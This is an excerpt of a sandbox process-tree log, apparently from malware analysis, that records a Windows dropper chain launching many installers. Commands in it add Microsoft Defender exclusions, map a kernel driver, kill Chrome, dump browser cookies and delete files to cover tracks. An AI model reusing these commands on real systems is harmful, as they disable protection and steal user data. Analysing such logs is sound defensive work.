C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"58⤵PID:6928
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\msp0px1p.x4h\HookSetp.exe & exit56⤵PID:9148
-
C:\Users\Admin\AppData\Local\Temp\msp0px1p.x4h\HookSetp.exeC:\Users\Admin\AppData\Local\Temp\msp0px1p.x4h\HookSetp.exe57⤵PID:7272
-
C:\ProgramData\2035721.22"C:\ProgramData\2035721.22"58⤵PID:10268
-
C:\ProgramData\6518371.71"C:\ProgramData\6518371.71"58⤵PID:12120
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fsgkmsgj.nmn\GcleanerWW.exe /mixone & exit56⤵PID:9364
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ix0wydlw.azb\privacytools5.exe & exit56⤵PID:6512
-
C:\Users\Admin\AppData\Local\Temp\ix0wydlw.azb\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\ix0wydlw.azb\privacytools5.exe57⤵PID:12828
-
C:\Users\Admin\AppData\Local\Temp\ix0wydlw.azb\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\ix0wydlw.azb\privacytools5.exe58⤵PID:10732
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2h1ba30d.bin\setup.exe /8-2222 & exit56⤵PID:16352
-
C:\Users\Admin\AppData\Local\Temp\2h1ba30d.bin\setup.exeC:\Users\Admin\AppData\Local\Temp\2h1ba30d.bin\setup.exe /8-222257⤵PID:2144
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Broken-River"58⤵PID:17228
-
C:\Program Files (x86)\Broken-River\7za.exe"C:\Program Files (x86)\Broken-River\7za.exe" e -p154.61.71.51 winamp-plugins.7z58⤵PID:9684
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Broken-River\setup.exe" -map "C:\Program Files (x86)\Broken-River\WinmonProcessMonitor.sys""58⤵PID:13572
-
C:\Program Files (x86)\Broken-River\setup.exe"C:\Program Files (x86)\Broken-River\setup.exe" -map "C:\Program Files (x86)\Broken-River\WinmonProcessMonitor.sys"59⤵PID:15864
-
C:\Program Files (x86)\Broken-River\7za.exe"C:\Program Files (x86)\Broken-River\7za.exe" e -p154.61.71.51 winamp.7z58⤵PID:12748
-
C:\Program Files (x86)\Broken-River\setup.exe"C:\Program Files (x86)\Broken-River\setup.exe" /8-222258⤵PID:14396
-
C:\Program Files (x86)\Broken-River\setup.exe"C:\Program Files (x86)\Broken-River\setup.exe" /8-222259⤵PID:7740
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\45thdfn0.hht\MultitimerFour.exe & exit56⤵PID:10224
-
C:\Users\Admin\AppData\Local\Temp\45thdfn0.hht\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\45thdfn0.hht\MultitimerFour.exe57⤵PID:5936
-
C:\Users\Admin\AppData\Local\Temp\L8QD1WBCL8\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\L8QD1WBCL8\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10458⤵PID:12520
-
C:\Users\Admin\AppData\Local\Temp\L8QD1WBCL8\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\L8QD1WBCL8\multitimer.exe" 1 3.1616083886.60537baea2cf3 10459⤵PID:7356
-
C:\Users\Admin\AppData\Local\Temp\L8QD1WBCL8\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\L8QD1WBCL8\multitimer.exe" 2 3.1616083886.60537baea2cf360⤵PID:4600
-
C:\Users\Admin\AppData\Local\Temp\x5chmx1xmm5\AwesomePoolU1.exe"C:\Users\Admin\AppData\Local\Temp\x5chmx1xmm5\AwesomePoolU1.exe"61⤵PID:5304
-
C:\Users\Admin\AppData\Local\Temp\feyw1ijugfm\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\feyw1ijugfm\askinstall24.exe"61⤵PID:9384
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe62⤵PID:11780
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe63⤵
- Kills process with taskkill
PID:10568 -
C:\Users\Admin\AppData\Local\Temp\zv4c4zlg5f2\vict.exe"C:\Users\Admin\AppData\Local\Temp\zv4c4zlg5f2\vict.exe" /VERYSILENT /id=53561⤵PID:5912
-
C:\Users\Admin\AppData\Local\Temp\is-J3FBP.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-J3FBP.tmp\vict.tmp" /SL5="$C0564,870426,780800,C:\Users\Admin\AppData\Local\Temp\zv4c4zlg5f2\vict.exe" /VERYSILENT /id=53562⤵PID:13796
-
C:\Users\Admin\AppData\Local\Temp\is-33PAE.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-33PAE.tmp\wimapi.exe" 53563⤵PID:9844
-
C:\Users\Admin\AppData\Local\Temp\lob5fauepk2\aokmi1ieuny.exe"C:\Users\Admin\AppData\Local\Temp\lob5fauepk2\aokmi1ieuny.exe" /ustwo INSTALL61⤵PID:14064
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 14064 -s 65262⤵
- Program crash
PID:17380 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 14064 -s 66062⤵
- Program crash
PID:8116 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 14064 -s 76462⤵
- Program crash
PID:16452 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 14064 -s 80062⤵
- Program crash
PID:3824 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 14064 -s 89662⤵
- Program crash
PID:16140 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 14064 -s 92862⤵
- Program crash
PID:6996 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 14064 -s 109262⤵
- Program crash
PID:15456 -
C:\Users\Admin\AppData\Local\Temp\we23qsrjsed\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\we23qsrjsed\Setup3310.exe" /Verysilent /subid=57761⤵PID:14480
-
C:\Users\Admin\AppData\Local\Temp\is-DP6EQ.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-DP6EQ.tmp\Setup3310.tmp" /SL5="$30696,138429,56832,C:\Users\Admin\AppData\Local\Temp\we23qsrjsed\Setup3310.exe" /Verysilent /subid=57762⤵PID:13584
-
C:\Users\Admin\AppData\Local\Temp\is-KH70I.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-KH70I.tmp\Setup.exe" /Verysilent63⤵PID:13344
-
C:\Users\Admin\AppData\Local\Temp\is-1LUCK.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-1LUCK.tmp\Setup.tmp" /SL5="$5043A,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-KH70I.tmp\Setup.exe" /Verysilent64⤵PID:15728
-
C:\Users\Admin\AppData\Local\Temp\is-EH2VS.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-EH2VS.tmp\Delta.exe" /Verysilent65⤵PID:11936
-
C:\Users\Admin\AppData\Local\Temp\is-DHN2N.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-DHN2N.tmp\Delta.tmp" /SL5="$E0118,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-EH2VS.tmp\Delta.exe" /Verysilent66⤵PID:11348
-
C:\Users\Admin\AppData\Local\Temp\is-A6F9T.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-A6F9T.tmp\Setup.exe" /VERYSILENT67⤵PID:10764
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-A6F9T.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit68⤵PID:9192
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f69⤵
- Kills process with taskkill
PID:6964 -
C:\Windows\SysWOW64\timeout.exetimeout /t 669⤵
- Delays execution with timeout.exe
PID:14928 -
C:\Users\Admin\AppData\Local\Temp\is-EH2VS.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-EH2VS.tmp\PictureLAb.exe" /Verysilent65⤵PID:15496
-
C:\Users\Admin\AppData\Local\Temp\is-2SV0H.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-2SV0H.tmp\PictureLAb.tmp" /SL5="$9045E,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-EH2VS.tmp\PictureLAb.exe" /Verysilent66⤵PID:12904
-
C:\Users\Admin\AppData\Local\Temp\is-VS5FS.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-VS5FS.tmp\Setup.exe" /VERYSILENT67⤵PID:13288
-
C:\Users\Admin\AppData\Local\Temp\is-JJTLA.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-JJTLA.tmp\Setup.tmp" /SL5="$1B005A,298214,214528,C:\Users\Admin\AppData\Local\Temp\is-VS5FS.tmp\Setup.exe" /VERYSILENT68⤵PID:5192
-
C:\Users\Admin\AppData\Local\Temp\is-KQ7TL.tmp\HGT.exe"C:\Users\Admin\AppData\Local\Temp\is-KQ7TL.tmp\HGT.exe" /S /UID=lab21469⤵PID:13908
-
C:\Users\Admin\AppData\Local\Temp\13-57229-5c9-8c0be-43194da022ba9\Luzhyjaraqy.exe"C:\Users\Admin\AppData\Local\Temp\13-57229-5c9-8c0be-43194da022ba9\Luzhyjaraqy.exe"70⤵PID:2508
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dl55xsow.jwz\gaooo.exe & exit71⤵PID:10836
-
C:\Users\Admin\AppData\Local\Temp\dl55xsow.jwz\gaooo.exeC:\Users\Admin\AppData\Local\Temp\dl55xsow.jwz\gaooo.exe72⤵PID:1372
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt73⤵PID:12412
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt73⤵PID:13652
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vedm0c3d.ymf\md7_7dfj.exe & exit71⤵PID:16264
-
C:\Users\Admin\AppData\Local\Temp\vedm0c3d.ymf\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\vedm0c3d.ymf\md7_7dfj.exe72⤵PID:17832
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bzmxpfok.awq\askinstall29.exe & exit71⤵PID:13944
-
C:\Users\Admin\AppData\Local\Temp\bzmxpfok.awq\askinstall29.exeC:\Users\Admin\AppData\Local\Temp\bzmxpfok.awq\askinstall29.exe72⤵PID:7840
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe73⤵PID:17188
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe74⤵
- Kills process with taskkill
PID:6544 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4qdwqfqi.isl\customer4.exe & exit71⤵PID:8900
-
C:\Users\Admin\AppData\Local\Temp\4qdwqfqi.isl\customer4.exeC:\Users\Admin\AppData\Local\Temp\4qdwqfqi.isl\customer4.exe72⤵PID:7160
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"73⤵PID:9816
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pwl2yr0c.2sy\HookSetp.exe & exit71⤵PID:4508
-
C:\Users\Admin\AppData\Local\Temp\pwl2yr0c.2sy\HookSetp.exeC:\Users\Admin\AppData\Local\Temp\pwl2yr0c.2sy\HookSetp.exe72⤵PID:7996
-
C:\ProgramData\5668464.62"C:\ProgramData\5668464.62"73⤵PID:10644
-
C:\ProgramData\1156113.12"C:\ProgramData\1156113.12"73⤵PID:5632
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\34ruh4b1.ttn\GcleanerWW.exe /mixone & exit71⤵PID:17768
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vcwivskv.ow5\privacytools5.exe & exit71⤵PID:12620
-
C:\Users\Admin\AppData\Local\Temp\vcwivskv.ow5\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\vcwivskv.ow5\privacytools5.exe72⤵PID:12536
-
C:\Users\Admin\AppData\Local\Temp\vcwivskv.ow5\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\vcwivskv.ow5\privacytools5.exe73⤵PID:16892
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ksfhu4f0.x4l\setup.exe /8-2222 & exit71⤵PID:8880
-
C:\Users\Admin\AppData\Local\Temp\ksfhu4f0.x4l\setup.exeC:\Users\Admin\AppData\Local\Temp\ksfhu4f0.x4l\setup.exe /8-222272⤵PID:10724
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Icy-Feather"73⤵PID:6652
-
C:\Program Files (x86)\Icy-Feather\7za.exe"C:\Program Files (x86)\Icy-Feather\7za.exe" e -p154.61.71.51 winamp-plugins.7z73⤵PID:15540
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Icy-Feather\setup.exe" -map "C:\Program Files (x86)\Icy-Feather\WinmonProcessMonitor.sys""73⤵PID:17172
-
C:\Program Files (x86)\Icy-Feather\setup.exe"C:\Program Files (x86)\Icy-Feather\setup.exe" -map "C:\Program Files (x86)\Icy-Feather\WinmonProcessMonitor.sys"74⤵PID:9900
-
C:\Program Files (x86)\Icy-Feather\7za.exe"C:\Program Files (x86)\Icy-Feather\7za.exe" e -p154.61.71.51 winamp.7z73⤵PID:5240
-
C:\Program Files (x86)\Icy-Feather\setup.exe"C:\Program Files (x86)\Icy-Feather\setup.exe" /8-222273⤵PID:11372
-
C:\Program Files (x86)\Icy-Feather\setup.exe"C:\Program Files (x86)\Icy-Feather\setup.exe" /8-222274⤵PID:11008
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dby1co2q.vtc\MultitimerFour.exe & exit71⤵PID:7716
-
C:\Users\Admin\AppData\Local\Temp\dby1co2q.vtc\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\dby1co2q.vtc\MultitimerFour.exe72⤵PID:5944
-
C:\Users\Admin\AppData\Local\Temp\ZAU0YBBL1Y\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ZAU0YBBL1Y\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10473⤵PID:9876
-
C:\Users\Admin\AppData\Local\Temp\ZAU0YBBL1Y\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ZAU0YBBL1Y\multitimer.exe" 1 3.1616083993.60537c19363b4 10474⤵PID:8300
-
C:\Users\Admin\AppData\Local\Temp\ZAU0YBBL1Y\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ZAU0YBBL1Y\multitimer.exe" 2 3.1616083993.60537c19363b475⤵PID:15380
-
C:\Users\Admin\AppData\Local\Temp\gznzzew1x2q\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\gznzzew1x2q\Setup3310.exe" /Verysilent /subid=57776⤵PID:18256
-
C:\Users\Admin\AppData\Local\Temp\is-C4BHQ.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-C4BHQ.tmp\Setup3310.tmp" /SL5="$307D2,138429,56832,C:\Users\Admin\AppData\Local\Temp\gznzzew1x2q\Setup3310.exe" /Verysilent /subid=57777⤵PID:7004
-
C:\Users\Admin\AppData\Local\Temp\is-M2USE.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-M2USE.tmp\Setup.exe" /Verysilent78⤵PID:7960
-
C:\Users\Admin\AppData\Local\Temp\is-7ED9I.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-7ED9I.tmp\Setup.tmp" /SL5="$30808,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-M2USE.tmp\Setup.exe" /Verysilent79⤵PID:16680
-
C:\Users\Admin\AppData\Local\Temp\is-83MHO.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-83MHO.tmp\Delta.exe" /Verysilent80⤵PID:13992
-
C:\Users\Admin\AppData\Local\Temp\is-QJ7HJ.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-QJ7HJ.tmp\Delta.tmp" /SL5="$404E4,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-83MHO.tmp\Delta.exe" /Verysilent81⤵PID:18192
-
C:\Users\Admin\AppData\Local\Temp\is-7R4SU.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-7R4SU.tmp\Setup.exe" /VERYSILENT82⤵PID:15720
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-7R4SU.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit83⤵PID:3084
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f84⤵
- Kills process with taskkill
PID:17104 -
C:\Windows\SysWOW64\timeout.exetimeout /t 684⤵
- Delays execution with timeout.exe
PID:12196 -
C:\Users\Admin\AppData\Local\Temp\is-83MHO.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-83MHO.tmp\PictureLAb.exe" /Verysilent80⤵PID:16224
-
C:\Users\Admin\AppData\Local\Temp\is-CL5EL.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-CL5EL.tmp\PictureLAb.tmp" /SL5="$A055C,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-83MHO.tmp\PictureLAb.exe" /Verysilent81⤵PID:17076
-
C:\Users\Admin\AppData\Local\Temp\is-G8POG.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-G8POG.tmp\Setup.exe" /VERYSILENT82⤵PID:16348
-
C:\Users\Admin\AppData\Local\Temp\is-TD6C5.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-TD6C5.tmp\Setup.tmp" /SL5="$208D8,298214,214528,C:\Users\Admin\AppData\Local\Temp\is-G8POG.tmp\Setup.exe" /VERYSILENT83⤵PID:16336
-
C:\Users\Admin\AppData\Local\Temp\is-L7FA6.tmp\HGT.exe"C:\Users\Admin\AppData\Local\Temp\is-L7FA6.tmp\HGT.exe" /S /UID=lab21484⤵PID:11924
-
C:\Users\Admin\AppData\Local\Temp\d1-c2c91-91c-794b9-68dababb8c112\Nojetybisu.exe"C:\Users\Admin\AppData\Local\Temp\d1-c2c91-91c-794b9-68dababb8c112\Nojetybisu.exe"85⤵PID:10548
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\j4ewuh02.g3x\gaooo.exe & exit86⤵PID:10840
-
C:\Users\Admin\AppData\Local\Temp\j4ewuh02.g3x\gaooo.exeC:\Users\Admin\AppData\Local\Temp\j4ewuh02.g3x\gaooo.exe87⤵PID:9344
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt88⤵PID:5488
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt88⤵PID:17984
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vdj2nede.03u\md7_7dfj.exe & exit86⤵PID:6664
-
C:\Users\Admin\AppData\Local\Temp\vdj2nede.03u\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\vdj2nede.03u\md7_7dfj.exe87⤵PID:6904
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\o3setdfz.pr4\askinstall29.exe & exit86⤵PID:14156
-
C:\Users\Admin\AppData\Local\Temp\o3setdfz.pr4\askinstall29.exeC:\Users\Admin\AppData\Local\Temp\o3setdfz.pr4\askinstall29.exe87⤵PID:10804
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe88⤵PID:16376
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe89⤵
- Kills process with taskkill
PID:7632 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\v040de43.b4k\customer4.exe & exit86⤵PID:8908
-
C:\Users\Admin\AppData\Local\Temp\v040de43.b4k\customer4.exeC:\Users\Admin\AppData\Local\Temp\v040de43.b4k\customer4.exe87⤵PID:14108
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"88⤵PID:12188
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ziecrqda.irf\HookSetp.exe & exit86⤵PID:11108
-
C:\Users\Admin\AppData\Local\Temp\ziecrqda.irf\HookSetp.exeC:\Users\Admin\AppData\Local\Temp\ziecrqda.irf\HookSetp.exe87⤵PID:17628
-
C:\ProgramData\4975720.54"C:\ProgramData\4975720.54"88⤵PID:4568
-
C:\ProgramData\5162585.56"C:\ProgramData\5162585.56"88⤵PID:9428
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xqcivham.55r\GcleanerWW.exe /mixone & exit86⤵PID:18036
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xr3yw5go.t42\privacytools5.exe & exit86⤵PID:6748
-
C:\Users\Admin\AppData\Local\Temp\xr3yw5go.t42\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\xr3yw5go.t42\privacytools5.exe87⤵PID:8700
-
C:\Users\Admin\AppData\Local\Temp\xr3yw5go.t42\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\xr3yw5go.t42\privacytools5.exe88⤵PID:3972
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mwiyxscq.qjz\setup.exe /8-2222 & exit86⤵PID:5200
-
C:\Users\Admin\AppData\Local\Temp\mwiyxscq.qjz\setup.exeC:\Users\Admin\AppData\Local\Temp\mwiyxscq.qjz\setup.exe /8-222287⤵PID:2608
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Damp-Dust"88⤵PID:8680
-
C:\Program Files (x86)\Damp-Dust\7za.exe"C:\Program Files (x86)\Damp-Dust\7za.exe" e -p154.61.71.51 winamp-plugins.7z88⤵PID:5236
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Damp-Dust\setup.exe" -map "C:\Program Files (x86)\Damp-Dust\WinmonProcessMonitor.sys""88⤵PID:5364
-
C:\Program Files (x86)\Damp-Dust\setup.exe"C:\Program Files (x86)\Damp-Dust\setup.exe" -map "C:\Program Files (x86)\Damp-Dust\WinmonProcessMonitor.sys"89⤵PID:10416
-
C:\Program Files (x86)\Damp-Dust\7za.exe"C:\Program Files (x86)\Damp-Dust\7za.exe" e -p154.61.71.51 winamp.7z88⤵PID:372
-
C:\Program Files (x86)\Damp-Dust\setup.exe"C:\Program Files (x86)\Damp-Dust\setup.exe" /8-222288⤵PID:13196
-
C:\Program Files (x86)\Damp-Dust\setup.exe"C:\Program Files (x86)\Damp-Dust\setup.exe" /8-222289⤵PID:308
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\u2mjquwr.veb\MultitimerFour.exe & exit86⤵PID:13372
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV187⤵PID:9788
-
C:\Users\Admin\AppData\Local\Temp\u2mjquwr.veb\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\u2mjquwr.veb\MultitimerFour.exe87⤵PID:14424
-
C:\Users\Admin\AppData\Local\Temp\IA7LF3OFR7\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\IA7LF3OFR7\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10488⤵PID:9968
-
C:\Users\Admin\AppData\Local\Temp\IA7LF3OFR7\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\IA7LF3OFR7\multitimer.exe" 1 3.1616084101.60537c85e9df1 10489⤵PID:17148
-
C:\Users\Admin\AppData\Local\Temp\IA7LF3OFR7\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\IA7LF3OFR7\multitimer.exe" 2 3.1616084101.60537c85e9df190⤵PID:3056
-
C:\Users\Admin\AppData\Local\Temp\fgs1jh35lgj\dc2jvl2gr05.exe"C:\Users\Admin\AppData\Local\Temp\fgs1jh35lgj\dc2jvl2gr05.exe" /ustwo INSTALL91⤵PID:10324
-
C:\Users\Admin\AppData\Local\Temp\55g4jibv12g\vict.exe"C:\Users\Admin\AppData\Local\Temp\55g4jibv12g\vict.exe" /VERYSILENT /id=53591⤵PID:12688
-
C:\Users\Admin\AppData\Local\Temp\is-T4KJI.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-T4KJI.tmp\vict.tmp" /SL5="$506CE,870426,780800,C:\Users\Admin\AppData\Local\Temp\55g4jibv12g\vict.exe" /VERYSILENT /id=53592⤵PID:11868
-
C:\Users\Admin\AppData\Local\Temp\is-TU5MF.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-TU5MF.tmp\wimapi.exe" 53593⤵PID:5072
-
C:\Users\Admin\AppData\Local\Temp\xkcjrv4caef\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\xkcjrv4caef\askinstall24.exe"91⤵PID:12284
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe92⤵PID:3936
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe93⤵
- Kills process with taskkill
PID:12856 -
C:\Users\Admin\AppData\Local\Temp\tmbtopivqm5\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\tmbtopivqm5\Setup3310.exe" /Verysilent /subid=57791⤵PID:10504
-
C:\Users\Admin\AppData\Local\Temp\is-55S41.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-55S41.tmp\Setup3310.tmp" /SL5="$F08C2,138429,56832,C:\Users\Admin\AppData\Local\Temp\tmbtopivqm5\Setup3310.exe" /Verysilent /subid=57792⤵PID:8244
-
C:\Users\Admin\AppData\Local\Temp\is-C42LT.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-C42LT.tmp\Setup.exe" /Verysilent93⤵PID:8452
-
C:\Users\Admin\AppData\Local\Temp\is-8MCE2.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-8MCE2.tmp\Setup.tmp" /SL5="$603FE,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-C42LT.tmp\Setup.exe" /Verysilent94⤵PID:5524
-
C:\Users\Admin\AppData\Local\Temp\is-3LACS.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-3LACS.tmp\Delta.exe" /Verysilent95⤵PID:11280
-
C:\Users\Admin\AppData\Local\Temp\is-48029.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-48029.tmp\Delta.tmp" /SL5="$B086C,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-3LACS.tmp\Delta.exe" /Verysilent96⤵PID:11388
-
